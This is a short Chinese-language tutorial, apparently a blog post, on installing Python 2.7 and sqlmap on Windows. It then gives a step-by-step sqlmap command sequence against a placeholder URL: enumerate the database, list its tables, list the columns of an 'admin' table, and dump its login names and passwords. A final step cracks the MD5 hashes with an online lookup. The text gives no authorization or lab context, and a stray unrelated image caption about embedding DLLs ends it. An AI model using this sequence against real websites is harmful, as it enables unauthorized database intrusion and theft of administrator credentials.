第一步:
安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。
附件(Python2.7.1安装包+sqlmap包):
https://download.csdn.net/download/qq_23306363/10724195
第二步:
1)win+R,输入cmd,输入 cd c:\ 进入c盘
2)确定网址:如"http://XXX"
3)输入Python27\sqlmap\sqlmap.py -u"http://XXX" --forms
4)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql --current-db 找到当前的库名称,如:BaseA
5)Python27\sqlmap\sqlmap.py -u “http://XXX” --forms --dbms mysql -D BaseA --tables 找到所有的表,比如有: admin,student,classes
6)Python27\sqlmap\sqlmap.py -u"http://XXX"–forms --dbms mysql -D BaseA -T admin --columns 找到admin表的所有字段,如 name,pwd
7)Python27\sqlmap\sqlmap.py -u"http://XXX" --forms --dbms mysql -D BaseA -T admin -C name,pwd --dump 显示出该表所有登录名及密码
8)拷贝出pwd百度MD5在线解密,即可查出pwd.
![exe中怎么嵌入dll?在资源中配置dll通过反射机制注册资源中的dll[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)